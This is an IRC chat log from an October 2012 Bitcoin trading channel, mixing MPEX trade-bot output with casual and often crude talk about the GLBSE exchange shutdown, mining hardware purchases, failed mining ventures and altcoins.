07 02:46:08 [MPEX] [S.MPOE] 7160 @ 0.00037366 = 2.6754 BTC [-] Oct 07 02:47:50 [MPEX] [O.BTCUSD.P130T] 650 @ 0.19800156 = 128.701 BTC [+] Oct 07 03:12:58 [MPEX] [S.MPOE] 6540 @ 0.00037366 = 2.4437 BTC [-] Oct 07 03:12:59 [MPEX] [S.MPOE] 5900 @ 0.00037265 = 2.1986 BTC [-] Oct 07 03:13:00 [MPEX] [S.MPOE] 31860 @ 0.00037219 = 11.858 BTC [-] Oct 07 03:38:07 [MPEX] [S.MPOE] 21286 @ 0.00037219 = 7.9224 BTC [-] Oct 07 03:38:08 [MPEX] [S.MPOE] 26554 @ 0.00037198 = 9.8776 BTC [-] Oct 07 03:38:09 [MPEX] [S.MPOE] 4560 @ 0.00037172 = 1.695 BTC [-] Oct 07 03:41:05 [MPEX] [S.DICE] 550 @ 0.00339995 = 1.87 BTC [+] Oct 07 04:06:23 [MPEX] [S.MPOE] 7440 @ 0.00037172 = 2.7656 BTC [-] Oct 07 04:14:20 ;;ticker Oct 07 04:14:20 Best bid: 11.99991, Best ask: 12, Bid-ask spread: 0.00009, Last trade: 12, 24 hour volume: 38173, 24 hour low: 12, 24 hour high: 12.8136 Oct 07 04:31:25 [MPEX] [S.MPOE] 4400 @ 0.00037067 = 1.6309 BTC [-] Oct 07 04:31:59 well, I activated my loan... Oct 07 04:33:36 anyone know how long BFL will be accepting trade-ins for ASICs? Oct 07 04:37:43 boonies4u: answering your question would requiere to assume a whole lot of uncertainties to be true... Oct 07 04:38:27 iirc they would be accepting them for trade in for some time after releasing pre orders Oct 07 04:39:06 [MPEX] [S.DICE] 437913 @ 0.0032725 = 1433.0703 BTC [-] Oct 07 04:39:27 Yeah, but in first place you're assuming that BFL is making ASICS, that they're going to be ready on a relatively short term... Oct 07 04:40:05 That they're going to accept a swap for that supposed new product... Oct 07 04:40:11 oh, i'm in no rush to get an ASIC Oct 07 04:40:16 That's a lot of assumptions Oct 07 04:40:56 if they aren't making ASICs, I'll be stuck with an FPGA Oct 07 04:41:18 i'm not pre-ordering Oct 07 04:42:02 Ok, I'm just saying that until ALL of those assumptions becomes a certainty, your question is impossible to answer Oct 07 04:42:37 do you remember hearing that they would be taking in trade-ins for some time? Oct 07 04:43:15 Yeah, I read a lot of people saying a lot of things Oct 07 04:43:39 And yes, they say they would take trade-ins Oct 07 04:44:07 hmm Oct 07 04:44:07 But I don't know if those supposed trade-ins would be limited in time Oct 07 04:44:27 I'll just wait until I get an email back Oct 07 04:44:44 and eat whatever costs come from BTC price drop Oct 07 04:45:25 I'm sure you can hedge your position Oct 07 04:45:44 this is my position : https://btcjam.com/listings/38 Oct 07 04:48:58 Oh, you took a loan to buy harware? Oct 07 04:52:00 and mining turds Oct 07 04:52:17 lol Oct 07 04:52:39 and without the mining turds, I need to bring in mined coins ASAP Oct 07 04:52:51 Well, with glbse down, you're safe from the turds, at least Oct 07 04:53:06 I wasn't afraid of the turds Oct 07 04:53:28 and neither were my investors apparently Oct 07 04:53:42 Ok Oct 07 04:54:04 I am afraid of waiting 3 weeks for an FPGA to get here, as I burn through coins Oct 07 04:54:50 Yeah, is a sensible time to buy hardware, so close of the reward halving.... Oct 07 04:55:11 Lots of uncertainties Oct 07 04:55:31 maybe you were right about the mining turds Oct 07 04:55:42 might have just been one less thing that could fuck me Oct 07 04:57:18 [MPEX] [O.BTCUSD.P090T] 10 @ 0.05188801 = 0.5189 BTC [+] Oct 07 04:58:25 [MPEX] [O.BTCUSD.P100T] 10 @ 0.06815531 = 0.6816 BTC [-] Oct 07 05:00:43 [MPEX] [O.BTCUSD.P110T] 10 @ 0.105 = 1.05 BTC [+] Oct 07 05:00:54 [MPEX] [O.BTCUSD.P200T] 313 @ 0.78195045 = 244.7505 BTC [+] Oct 07 05:03:19 I don't know, but if asics really come out, the turds are going to plumbet even more Oct 07 05:04:21 If there'll be no asic, they can recover some value, as the market has been pricing in that possibility from a while now... Oct 07 05:04:27 It's all a gamble Oct 07 05:04:35 Giga's upgrade is nice though Oct 07 05:04:50 Yeah, if it happens Oct 07 05:05:01 Now without glbse... Oct 07 05:05:14 I think the days of private mining contracts have returned Oct 07 05:05:38 I bought some dirty cheap giga.etf, but again, it's a gamble.... Oct 07 05:06:10 anything involving bitcoin is a gamble Oct 07 05:06:41 unless you're a business only accepting bitcoin through bitpay Oct 07 05:06:47 accepting only fiat Oct 07 05:06:50 Basically Oct 07 05:08:10 *sigh* Oct 07 05:08:27 If i was the feds i wpould just go around stealing bitcoins and scamming to destroy its confidence Oct 07 05:08:49 some people say MNW was a plant Oct 07 05:09:08 a pot plant maybe Oct 07 05:09:31 anyone realize if you spin MNW around it reads MNW Oct 07 05:09:41 I won't have smoked MNW... :/ Oct 07 05:09:42 anyone actually know his middle name? Oct 07 05:10:12 So it looks like the Tucson Chamber of Commerce likes me :D Oct 07 05:10:19 :) Oct 07 05:10:26 did you move there yet smickles? Oct 07 05:10:58 mod6: yeah, I'm here, we found a place to live day before yesterday, and just started putting our stuff in there today Oct 07 05:11:41 thats awesome. i miss the weather! Oct 07 05:12:35 .. i gotta head down there soon and visit Oct 07 05:13:26 sweet, I wonder how many 'bitcoiners' are within range of me now? Oct 07 05:13:37 (rogue question mark) Oct 07 05:13:40 where are ya? Oct 07 05:13:46 Arizone? Oct 07 05:13:49 Tucson AZ Oct 07 05:13:51 Arizona* Oct 07 05:14:35 well there's the drug lords in Mexico Oct 07 05:14:41 and the Startups in California Oct 07 05:14:47 and the gold bugs in Texas Oct 07 05:15:02 the first food joint we went to happend to be a 40 yr old chineese food place, family owned and delicious Oct 07 05:15:12 nice :) Oct 07 05:15:30 you'll have to give eegees a try Oct 07 05:15:31 they accept bitcoin? Oct 07 05:15:45 ;3 Oct 07 05:15:45 mod6: yeah, they're everywhere! Oct 07 05:16:01 lots of pirates in texas Oct 07 05:16:01 boonies4u: I wasn't prepared to pay in btc, so I didn't ask Oct 07 05:16:06 f yeah, its my personal fav. Oct 07 05:16:07 but now I should be Oct 07 05:16:20 <3 t-town Oct 07 05:16:20 smickles: would have been embarrassing if they said yes Oct 07 05:16:23 and you had none Oct 07 05:16:24 XD Oct 07 05:16:27 lol Oct 07 05:17:02 "just ahve to liquidate my illegal shares first " Oct 07 05:17:09 lol Oct 07 05:17:25 same here Oct 07 05:17:41 I remember it hard to get btc out of GLBSE before Oct 07 05:17:53 now it's like that + Jigsaw Oct 07 05:18:35 were there developments in the last 8 hous? Oct 07 05:18:38 *hours Oct 07 05:19:10 *looks out window* Oct 07 05:19:15 THEY STILL MAD Oct 07 05:19:28 lol Oct 07 05:19:32 as hell? Oct 07 05:19:39 are they going to take it anymore? Oct 07 05:19:43 pitchforks_torches.gif Oct 07 05:20:11 wait till monday I guess Oct 07 05:20:41 i'd bug Theymos Oct 07 05:20:50 smickles: http://www.youtube.com/watch?v=dib2-HBsF08 Oct 07 05:20:51 ? Oct 07 05:22:01 heh Oct 07 05:22:01 should just use opensim and run a virtual stock exchaneg inside it Oct 07 05:22:08 boonies4u: I was that way for an entire month Oct 07 05:22:13 and you know what? Oct 07 05:22:18 nefario won in the end Oct 07 05:22:27 getting mad doesnt do anything. Oct 07 05:22:47 noagendamarket: getting glad makes you a poser though Oct 07 05:23:27 so Im going to go back to my default policy Oct 07 05:23:31 I simply dont give a fuck. Oct 07 05:23:37 And you know what? Im happy! Oct 07 05:24:06 this behavior makes me very apathetic Oct 07 05:24:14 No more stress, no more babysitting trolls, no more losing the sleep I already dont get, no more daydreaming about something thats never going to happen, no more fucking bullshit Oct 07 05:24:43 complacency is a disease Oct 07 05:25:09 boonies4u: what about sex? Oct 07 05:25:21 or complacent sex? Oct 07 05:25:22 what? Oct 07 05:25:39 ... Oct 07 05:25:40 dunno, just being odd, i suppose Oct 07 05:26:02 [MPEX] [S.MPOE] 9000 @ 0.00037067 = 3.336 BTC [-] Oct 07 05:26:07 *cough* Oct 07 05:26:08 ok Oct 07 05:28:11 complacency isnt a disease Oct 07 05:28:19 long term stress resulting in a heart attach is a disease. Oct 07 05:28:52 complacency probably causes more heart disease than stress Oct 07 05:28:57 <____Atlas_____> Life is a disease Oct 07 05:29:03 <____Atlas_____> Cured by death Oct 07 05:29:04 fat fucks Oct 07 05:29:07 <____Atlas_____> /emo Oct 07 05:29:36 <____Atlas_____> Some idiot just put a bunch of anarchist propaganda in the Bitcoin wikipedia page. Oct 07 05:30:01 seriously, what do I get out of continuing to fight this? Oct 07 05:30:11 theres no reward. Oct 07 05:30:17 pro-anarchist propaganda? Oct 07 05:30:44 Diablo-D3: given your behavior, I won't take your seriously Oct 07 05:30:46 <____Atlas_____> It was more like "Bitcoin is an anarchist wetdream." Oct 07 05:30:47 from now on Oct 07 05:30:55 <____Atlas_____> "Stay the fuck away normal people." Oct 07 05:31:01 <____Atlas_____> "WOOO ANARCHY" Oct 07 05:31:02 ____Atlas_____: you're an anarchist night-tremor Oct 07 05:31:09 or is it terror? Oct 07 05:31:21 <____Atlas_____> I am just totally apolitical at this point. Oct 07 05:31:28 Agorist Oct 07 05:31:28 ? Oct 07 05:31:38 <____Atlas_____> That would be an apt description. Oct 07 05:32:22 boonies4u: take me seriously for what? I spent hundreds of hours trying to move DMC forward Oct 07 05:32:49 hundreds? Oct 07 05:33:00 yeah. Oct 07 05:33:04 like 200 hundred, or closer to 1000? Oct 07 05:33:10 bottom end of the scale Oct 07 05:33:55 <____Atlas_____> I have never heard somebody describe something in 100s of hours Oct 07 05:34:01 oh ok then Oct 07 05:34:04 <____Atlas_____> Usually you move on to weeks at that point. Oct 07 05:34:23 ;;ticker Oct 07 05:34:23 Best bid: 12.2, Best ask: 12.3098, Bid-ask spread: 0.10980, Last trade: 12.3098, 24 hour volume: 40408, 24 hour low: 11.95, 24 hour high: 12.8136 Oct 07 05:34:29 ;;bc,24hprc Oct 07 05:34:30 12.43 Oct 07 05:34:30 ____Atlas_____: it means that he didn't put in consistent hours per week Oct 07 05:34:35 12.2? Oct 07 05:34:46 <____Atlas_____> Damn it Oct 07 05:34:51 <____Atlas_____> I should of sold this morning Oct 07 05:34:53 with a low under 12?!@! Oct 07 05:35:10 <____Atlas_____> Yeah, just standard weekend dip affair Oct 07 05:35:18 <____Atlas_____> Nobody buys on weekends Oct 07 05:35:22 <____Atlas_____> so sell sell sell Oct 07 05:35:28 it dipped below 12? Oct 07 05:35:35 well, combined with a diff increase Oct 07 05:35:41 ____Atlas_____: even with GLBSE? Oct 07 05:35:50 <____Atlas_____> People could be speculating on that Oct 07 05:35:53 24 hour low: 11.95, boonies4u Oct 07 05:35:59 "could be" Oct 07 05:36:23 smickles: yeah I saw... Oct 07 05:36:34 I dunno if glbse affected the exchange rate at all Oct 07 05:36:45 which is a little sad Oct 07 05:36:54 that you don't know? Oct 07 05:36:56 <____Atlas_____> Reasonably, it should Oct 07 05:36:58 what have we been doing that had so little affect Oct 07 05:37:03 <____Atlas_____> Mining bonds and all that jazz Oct 07 05:37:17 ag, that carp Oct 07 05:37:21 <____Atlas_____> Apparently BFL was in cohoots with GLBSE Oct 07 05:37:31 <____Atlas_____> Planning to make things more, erm, efficient. Oct 07 05:37:31 howso? Oct 07 05:37:43 <____Atlas_____> They wanted to give GLBSE issuers the first batch of rigs Oct 07 05:37:56 <____Atlas_____> So it was the start of something nice for once Oct 07 05:38:18 <____Atlas_____> This is just statements on the forums but it is likely true Oct 07 05:38:24 <____Atlas_____> was* Oct 07 05:38:48 [10:34:00] <____Atlas_____> Usually you move on to weeks at that point. Oct 07 05:38:52 weeks doesnt make sense Oct 07 05:38:53 I wish the best of luck to Giga Oct 07 05:39:03 what is a week? 40 hours? 60? 80? 20? Oct 07 05:39:11 <____Atlas_____> 40 hours Oct 07 05:39:17 <____Atlas_____> Unless you're in China Oct 07 05:39:18 40 means you're a slacker. Oct 07 05:39:19 Diablo-D3: you probably didn't put 40 in a week Oct 07 05:39:20 <____Atlas_____> or a workaholic Oct 07 05:39:22 <____Atlas_____> oh lawd Oct 07 05:39:38 companies dont startup on only 40 hours a week. Oct 07 05:39:59 what did you do again? Oct 07 05:40:30 boonies4u: in the end? nothing much Oct 07 05:40:45 all I did was dance to nefario's tune while he fucked my shareholders Oct 07 05:41:08 what were you doing that took 40+ hours a week? Oct 07 05:41:21 boonies4u: you do know what DMC was doing, right? Oct 07 05:41:32 mining? Oct 07 05:41:40 a little bigger than that. Oct 07 05:41:46 Diablo Mining Company right? Oct 07 05:41:54 a green energy powered data center focusing on high density computing. Oct 07 05:41:58 mining was just a small part of it. Oct 07 05:42:09 high density computing? Oct 07 05:42:37 DMC had no equipment Oct 07 05:42:43 as in, if cooling fails, your computers will overheat quickly? Oct 07 05:43:16 I only really paid attention to the turds Oct 07 05:43:27 if you weren't selling turds, you probably weren't on my radar Oct 07 05:43:34 or didn't have the volume to attract me Oct 07 05:44:04 boonies4u: cooling fails? heh, not with redundant cooling Oct 07 05:44:09 Im talking about shit mounted in racks. Oct 07 05:44:20 or rather, 25-30kw of shit mounted in racks, per rack. Oct 07 05:44:32 that's what I imagined Oct 07 05:44:58 so what did the shares represent? % ownership? Oct 07 05:45:15 yup. Oct 07 05:45:23 oh shit Oct 07 05:45:29 you anonymous? Oct 07 05:45:49 doesnt matter, x% of zero is still zero. Oct 07 05:46:01 <____Atlas_____> http://static.quickmeme.com/media/social/qm.gif Oct 07 05:46:32 i'm confused, do you have any assets? Oct 07 05:46:39 no Oct 07 05:46:46 boonies4u: physical? no Oct 07 05:47:00 for the short term, I was reinvesting it into other companies Oct 07 05:47:05 oh lawd Oct 07 05:47:19 ____Atlas_____: why did you link a 1x1 gif? Oct 07 05:47:35 <____Atlas_____> Are you blind? Oct 07 05:47:37 <____Atlas_____> lol Oct 07 05:47:41 <____Atlas_____> idk Oct 07 05:47:44 ____Atlas_____: that isnt the image you thought it was Oct 07 05:47:50 <____Atlas_____> nope Oct 07 05:47:55 title : qm.gif (1x1) Oct 07 05:48:23 boonies4u: a million dollar project does not get done overnight. Oct 07 05:48:28 Im not sure why people think it does. Oct 07 05:48:57 i was oh lawding at your reinvesting Oct 07 05:50:15 <____Atlas_____> http://i.imgur.com/sSIhV.png Oct 07 05:50:55 yup, and thanks to nefario's bullshit, a large part of that money was burned Oct 07 05:51:03 and then thanks to MORE of nefario's bullshit, it all burned Oct 07 05:51:06 [MPEX] [S.MPOE] 10000 @ 0.0003711 = 3.711 BTC [+] Oct 07 05:51:08 and so did everyone else's Oct 07 05:51:08 [MPEX] [S.MPOE] 25460 @ 0.00037111 = 9.4485 BTC [+] Oct 07 05:51:34 I can understand why you are apathetic Oct 07 05:51:50 I bet your shareholders love it *rolls eyes* Oct 07 05:52:00 well, they'll have to fight nefario, not me Oct 07 05:52:14 Ive fought enough for the community, its time for them to return the favor Oct 07 05:52:36 glbse is controlled by nefarios lawyer Oct 07 05:52:57 who i probably butting heads with Theymos Oct 07 05:53:02 yes Oct 07 05:53:22 theymos doesnt agree with lawyers lol Oct 07 05:53:34 I'd bet Theymos is the voice of reason Oct 07 05:55:06 even if we removed nefario as ceo it wouldnt have mattered Oct 07 05:56:01 this is about Goat right? Oct 07 05:56:22 heh, goat Oct 07 05:56:38 at one point I was saying Im glad I sold all of my goat holding Oct 07 05:56:40 *holdings Oct 07 05:56:44 guess it doesnt matter now Oct 07 05:58:00 its more likely to be about the pirate stuff than anything Oct 07 05:58:47 if glbse had ID requirements inn the first place most likely the pirate stuff wouldnt have gotten so nuts Oct 07 05:59:12 inn the first place.. Oct 07 05:59:18 *writes that down* Oct 07 06:10:19 :P Oct 07 06:13:26 anyone willing to lend me the difference between my 99 btc and the total cost of two BFL FPGA singles? Oct 07 06:14:16 BFL is a scam :P Oct 07 06:14:32 you mean the FPGA's that currently exist are a scam? Oct 07 06:14:33 noagendamarket ya, but so is bitcoin Oct 07 06:14:38 lol Oct 07 06:15:08 ;;roulette Oct 07 06:15:08 *BANG* Hey, who put a blank in here?! Oct 07 06:15:12 crap Oct 07 06:16:06 ;;echo ;;roulette Oct 07 06:16:06 ;;roulette Oct 07 06:16:14 wellll ? Oct 07 06:16:22 .echo ;;roulette Oct 07 06:16:43 [MPEX] [S.BVPS] 400 @ 0.0035 = 1.4 BTC [+] Oct 07 06:19:04 mircea_popescu: trying to get assbot to do ;;roulette? Oct 07 06:19:12 lol Oct 07 06:20:04 ya Oct 07 06:34:19 <____Atlas_____> ;;roulette Oct 07 06:34:19 *click* Oct 07 06:34:23 <____Atlas_____> ;;roulette Oct 07 06:34:24 *click* Oct 07 06:34:24 <____Atlas_____> ;;roulette Oct 07 06:34:25 *click* Oct 07 06:34:26 <____Atlas_____> ;;roulette Oct 07 06:34:26 *click* Oct 07 06:34:28 <____Atlas_____> ;;roulette Oct 07 06:34:28 *click* Oct 07 06:34:31 <____Atlas_____> /fire Oct 07 06:34:37 <____Atlas_____> ;;fire Oct 07 06:34:38 Error: "fire" is not a valid command. Oct 07 06:34:42 <____Atlas_____> ;;shoot Oct 07 06:34:42 Error: "shoot" is not a valid command. Oct 07 06:34:57 <____Atlas_____> ;;roulette Oct 07 06:34:57 *BANG* Hey, who put a blank in here?! Oct 07 06:35:03 [MPEX] [S.MPOE] 23628 @ 0.00037366 = 8.8288 BTC [+] Oct 07 06:35:04 [MPEX] [S.MPOE] 53300 @ 0.00037067 = 19.7567 BTC [-] Oct 07 06:35:06 [MPEX] [S.MPOE] 51500 @ 0.0003706 = 19.0859 BTC [-] Oct 07 06:35:07 [MPEX] [S.MPOE] 47700 @ 0.00037005 = 17.6514 BTC [-] Oct 07 06:35:08 [MPEX] [S.MPOE] 7700 @ 0.00037 = 2.849 BTC [-] Oct 07 06:35:09 [MPEX] [S.MPOE] 3583 @ 0.00036906 = 1.3223 BTC [-] Oct 07 06:35:09 <____Atlas_____> Blanks can still kill Oct 07 06:35:09 [MPEX] [S.MPOE] 42256 @ 0.00036883 = 15.5853 BTC [-] Oct 07 06:35:10 [MPEX] [S.MPOE] 250 @ 0.00036878 = 0.0922 BTC [-] Oct 07 06:35:11 [MPEX] [S.MPOE] 57496 @ 0.00036869 = 21.1982 BTC [-] Oct 07 06:35:12 [MPEX] [S.MPOE] 11784 @ 0.00036756 = 4.3313 BTC [-] Oct 07 06:35:13 [MPEX] [S.MPOE] 13900 @ 0.00036731 = 5.1056 BTC [-] Oct 07 06:35:14 [MPEX] [S.MPOE] 31900 @ 0.00036651 = 11.6917 BTC [-] Oct 07 06:35:15 [MPEX] [S.MPOE] 42700 @ 0.00036611 = 15.6329 BTC [-] Oct 07 06:35:16 [MPEX] [S.MPOE] 58959 @ 0.00036537 = 21.5418 BTC [-] Oct 07 06:35:17 [MPEX] [S.MPOE] 62800 @ 0.00036149 = 22.7016 BTC [-] Oct 07 06:35:18 [MPEX] [S.MPOE] 2500 @ 0.000351 = 0.8775 BTC [-] Oct 07 06:35:18 [MPEX] [S.MPOE] 153359 @ 0.00035 = 53.6757 BTC [-] Oct 07 06:37:17 <____Atlas_____> http://blockchain.info/charts/total-bitcoins Oct 07 06:37:17 someones taking a dump on mpoe Oct 07 06:37:25 <____Atlas_____> What happened in September? Oct 07 06:37:27 they hate meee Oct 07 06:37:50 <3 mircea_popescu Oct 07 06:37:55 :) Oct 07 06:38:06 ____Atlas_____: a large increase in hashing capacity Oct 07 06:38:24 ya, btc time is not fixed to irl time Oct 07 06:39:43 the difficulty adjustments weren't enough to compensate for the large and irregular hash power increase as far as i can see Oct 07 06:42:18 ;;rate 1 Kumala vircurex/cryptostocks guy. Oct 07 06:42:18 Error: 'Kumala' is not a valid integer. Oct 07 06:42:23 ;;rate Kumala 1 vircurex/cryptostocks guy. Oct 07 06:42:23 Error: For identification purposes, you must be identified via GPG to use the rating system. Oct 07 06:42:27 ggrrr Oct 07 06:43:21 ;;rate Kumala 1 vircurex/cryptostocks guy. Oct 07 06:43:22 Rating entry successful. Your rating of 1 for user Kumala has been recorded. Oct 07 06:43:26 halelujah. Oct 07 06:46:35 <____Atlas_____> So we may end up seeing all the BTC generated earlier than 2030? Oct 07 06:47:29 ____Atlas_____ its quite probable. Oct 07 06:49:07 <____Atlas_____> Man I'll be old then Oct 07 06:54:00 <____Atlas_____> Old men running the world. A new age! Oct 07 06:54:02 <____Atlas_____> http://www.youtube.com/watch?v=Vxi7JRJrod4 Oct 07 06:57:09 kakobrekla add cryptostox stream ? http://twitter.com/Cryptostocks Oct 07 06:57:40 but pleaze filter to btc only omg. Oct 07 06:59:31 what the heck is DVC? Oct 07 06:59:40 and DVB? Oct 07 06:59:42 devscamcoins Oct 07 06:59:45 double vaginal coin Oct 07 06:59:46 and devscambutts Oct 07 07:00:13 ah devcoins Oct 07 07:00:16 [MPEX] [S.BVPS] 480 @ 0.0035 = 1.68 BTC [+] Oct 07 07:00:20 wtf is a devcoin Oct 07 07:00:55 lol. grubbies, why don you make your own coin ? Oct 07 07:01:00 grublits. Oct 07 07:01:29 <____Atlas_____> grubles: an alt coin out of many Oct 07 07:01:42 <____Atlas_____> Soon we will have more currencies than the old American confederacy Oct 07 07:02:33 they never had as many as we do Oct 07 07:02:36 solidcoin counts as 10. Oct 07 07:02:37 mircea_popescu, because i believe in buttcoins Oct 07 07:02:48 aaa, but do buttcoins believe in you ? Oct 07 07:03:05 that is the age old question Oct 07 07:04:32 <____Atlas_____> We need a Buttcoin Oct 07 07:05:50 lol, just to make fun of the trolls? Oct 07 07:06:34 <____Atlas_____> Ha, they would have as much fun Oct 07 07:06:40 <____Atlas_____> and they would probably use them for shit Oct 07 07:07:26 have you ever squeezed your buttcheeks so hard you cracked your lower back? Oct 07 07:08:13 <____Atlas_____> I think you need more fiber if you experience that Oct 07 07:08:49 fiber has nothing to do with it Oct 07 07:09:06 sitting on my ass has everything to do with it Oct 07 07:11:19 !ticker s.mpoe Oct 07 07:11:21 [MPEX:S.MPOE] 1day: 0.00035 / 0.0003698 / 0.00037575 (2318319 shares, 857.32 BTC), 30day: 0.00034 / 0.00038476 / 0.00042 (65387672 shares, 25,158.64 BTC) Oct 07 07:22:41 you can trade toilet paper for buttcoins Oct 07 07:25:04 noagendamarket, wtt 10 tp for 20 btc? Oct 07 07:25:34 lol Oct 07 07:25:53 its easy to mail toilet paper Oct 07 07:26:03 double or single ply ? Oct 07 07:26:17 as many as you want holmes Oct 07 07:26:39 i have a direct connect to a supplier in columbia Oct 07 07:27:17 [MPEX] [S.MPOE] 25032 @ 0.00030391 = 7.6075 BTC [-] Oct 07 07:27:20 cocaine leaf tp Oct 07 07:27:25 I wonder if you had lsd on toliet paper if you wiped your butt you would get high lol Oct 07 07:27:27 for all your hhemorhhidal news Oct 07 07:27:30 needs* Oct 07 07:27:38 bahaha Oct 07 07:27:40 heroin wipes :P Oct 07 07:28:31 noagendamarket: you'd have to rub it hard but yea, the skin is pretty thin there and could easily transfer Oct 07 07:28:32 whole new dimension to chipping Oct 07 07:29:08 i knew some hippie ass chicks that would stick weaker acid tabs in their vaginas to help absorb more Oct 07 07:29:15 heh Oct 07 07:29:21 <____Atlas_____> what did i just read Oct 07 07:29:32 <____Atlas_____> out of context Oct 07 07:29:36 <____Atlas_____> that was interesting Oct 07 07:29:53 cryptorific, that makes more sense than getting high off of wiping your ass Oct 07 07:29:59 LOL Oct 07 07:30:22 but i can definitely bet one would get high off of wiping their ass with blotter paper Oct 07 07:31:22 <____Atlas_____> http://i.imgur.com/8xfIV.jpg Oct 07 07:31:55 shopped Oct 07 07:32:58 <____Atlas_____> nope, that's a real -- replica Oct 07 07:48:58 I have come up with 4 options moving forward when it comes to the loan I received. Oct 07 07:49:28 while, i created this for my lenders, if anyone has anything to say regarding them, it would be appreciated Oct 07 07:49:29 http://pastebin.com/9ZQnzK8R **** BEGIN LOGGING AT Sun Oct 7 17:08:51 2012 Oct 07 17:09:09 Each asset is unique no? Oct 07 17:09:18 http://www.reddit.com/r/Bitcoin/comments/112hsn/the_reasons_why_bitcoin_securities_cant_be/ Oct 07 17:09:35 do bonds also require issuer to know current owners? or is that what makes bearer bonds different, not knowing who has them? Oct 07 17:09:41 if anyone has a reddit account be so kind to point out to them that i don't, and so won't answer there, but they can feel free to make the comments on the article Oct 07 17:09:43 and get a response. Oct 07 17:10:01 each asset is unique yes, change even a bit, or a character of whitespace, and the hash changes thus the ID of the asset the contract is about changes Oct 07 17:10:16 so any change to contract results in a brand new distinct different asset Oct 07 17:10:38 Chaang-Noi: that markm's OT is not decentralised. It's even worst that centralized. If server, where sec. was issued disappears, security is gone too Oct 07 17:11:05 I was more asking, say I have 1000 shares of Asset A, would each one of those 1000 shares be unique, to keep them from being duplicated? Oct 07 17:11:16 You might be better served by posting in the law subreddit Oct 07 17:11:21 no, they are fungible Oct 07 17:11:31 where a bunch of actual lawyers or at least law students hang out Oct 07 17:11:36 deeds are each-unique but not yet implemented Oct 07 17:11:40 Bugpowder i ain't posting it tho, cause i have no acct. Oct 07 17:11:52 mircea_popescu: then get one Oct 07 17:12:11 how hard is that? Oct 07 17:12:34 Audit system is not yet implemented so my server does not spam all receipts out to public published form Oct 07 17:12:37 i hate accounts. Oct 07 17:12:44 so yes if my server vanishes issuers will not know what ownership changes happened since their last snapshot Oct 07 17:14:43 femtotube, do you mean how hard is spamming all receipts out to public media/channel? Oct 07 17:15:19 the hard part will be making sure only persons intended to be able to can actually decrypt specific receitps they should be able to see Oct 07 17:15:45 might be easier actually to record emails for issuers and spam issuer's email with all receipts about their asset Oct 07 17:16:12 but that would require "Knowing Your Issuers" Oct 07 17:16:53 KYC Oct 07 17:18:33 I actually hoped it might be possible to only know a very few customers, those being the few to whom any actual withdraws from the vault go, everyone else being their customers and dealing with them to buy tokens or cash out tokens Oct 07 17:19:28 like how egold and liberty reserve and possibly even pecunix do it, third parties to handle all cashing in and out Oct 07 17:21:22 [MPEX] [S.MPOE] 14267 @ 0.00025477 = 3.6348 BTC [-] Oct 07 17:22:15 ewgh wtf happened here. Oct 07 17:25:02 [MPEX] [S.MPOE] 14633 @ 0.00025477 = 3.728 BTC [-] Oct 07 17:25:04 [MPEX] [S.MPOE] 26800 @ 0.00025844 = 6.9262 BTC [+] Oct 07 17:25:05 [MPEX] [S.MPOE] 36000 @ 0.00026409 = 9.5072 BTC [+] Oct 07 17:25:06 [MPEX] [S.MPOE] 65400 @ 0.00027946 = 18.2767 BTC [+] Oct 07 17:25:08 [MPEX] [S.MPOE] 5778 @ 0.00031314 = 1.8093 BTC [+] Oct 07 17:25:56 [MPEX] [S.MPOE] 4618 @ 0.00032044 = 1.4798 BTC [+] Oct 07 17:25:58 [MPEX] [S.MPOE] 382 @ 0.00035 = 0.1337 BTC [+] Oct 07 17:26:42 WHOOOOO HOOOO Oct 07 17:27:11 you didn't notice? Oct 07 17:27:24 been buying that shit up all morning Oct 07 17:27:30 lol wd. Oct 07 17:28:57 10MM should probably be a nice supporting bid size Oct 07 17:29:07 i would think. Oct 07 17:48:30 [MPEX] [S.MPOE] 3550000 @ 0.000315 = 1118.25 BTC [-] Oct 07 17:50:10 ait Oct 07 17:50:20 wait for me Oct 07 17:50:44 0,o Oct 07 17:51:52 hum Oct 07 18:00:47 ;;ticker Oct 07 18:00:47 Best bid: 11.94501, Best ask: 11.95, Bid-ask spread: 0.00499, Last trade: 11.94501, 24 hour volume: 61886, 24 hour low: 11.702, 24 hour high: 12.78 Oct 07 18:00:51 ;;bc,24hprc Oct 07 18:00:52 12.21 Oct 07 18:01:33 no wonder people were buying puts lol Oct 07 18:02:36 ColdHardMetal so how goes man ? Oct 07 18:14:51 [MPEX] [S.MPOE] 24200 @ 0.0003422 = 8.2812 BTC [+] Oct 07 18:18:45 [MPEX] [S.MPOE] 67300 @ 0.00034111 = 22.9567 BTC [-] Oct 07 18:18:46 [MPEX] [S.MPOE] 42700 @ 0.00033888 = 14.4702 BTC [-] Oct 07 18:22:59 evening :) Oct 07 18:30:48 morning :) Oct 07 18:31:56 any news? Oct 07 18:32:35 "weekend dip" + diff increase + glbse incidnent = lower exchange rate, it seems Oct 07 18:32:50 and mircea_popescu wrote an article Oct 07 18:33:04 http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Oct 07 18:34:36 Yea, I have followed the price ^^ to me it seems like a chance to get some cheap bitcoins :P Oct 07 18:34:48 No more news on the whole GLBSE stuff? Oct 07 18:37:17 not that I know of Oct 07 18:38:35 theymos placed the glbse btc at 4-8k Oct 07 18:38:41 my estimates were 1-2k. something's amiss. Oct 07 18:38:58 GLBSE btc? Oct 07 18:39:05 and I thought you were ignoring me ^^ Oct 07 18:39:26 evoorhees put in a good word. Oct 07 18:39:52 hahah, I thought so Oct 07 18:40:01 What do you mean by GLBSE BTC btw? Oct 07 18:40:17 btc owned in cash by glbse customers on glbse website. Oct 07 18:40:41 ah Oct 07 18:40:49 Yea that has to be higher then 1-2k Oct 07 18:40:58 I personally have 500+ BTC on there Oct 07 18:41:55 Atleast 5000 BTC I would guess on Oct 07 18:41:57 probably more Oct 07 18:44:04 [MPEX] [S.MPOE] 18013 @ 0.00033888 = 6.1042 BTC [-] Oct 07 18:49:47 ;;ticker Oct 07 18:49:48 Best bid: 11.90004, Best ask: 11.9699, Bid-ask spread: 0.06986, Last trade: 11.90004, 24 hour volume: 62374, 24 hour low: 11.702, 24 hour high: 12.78 Oct 07 19:01:42 !help Oct 07 19:01:44 List of commands: Oct 07 19:01:45 !ticker (desc: returns current MPEX ticker values) Oct 07 19:03:26 !ticker S.MPOE Oct 07 19:03:27 [MPEX:S.MPOE] 1day: 0.00025015 / 0.00031653 / 0.00037575 (6558468 shares, 2,076.01 BTC), 30day: 0.00025015 / 0.00037846 / 0.00042 (70093609 shares, 26,528.18 BTC) Oct 07 19:09:13 [MPEX] [S.MPOE] 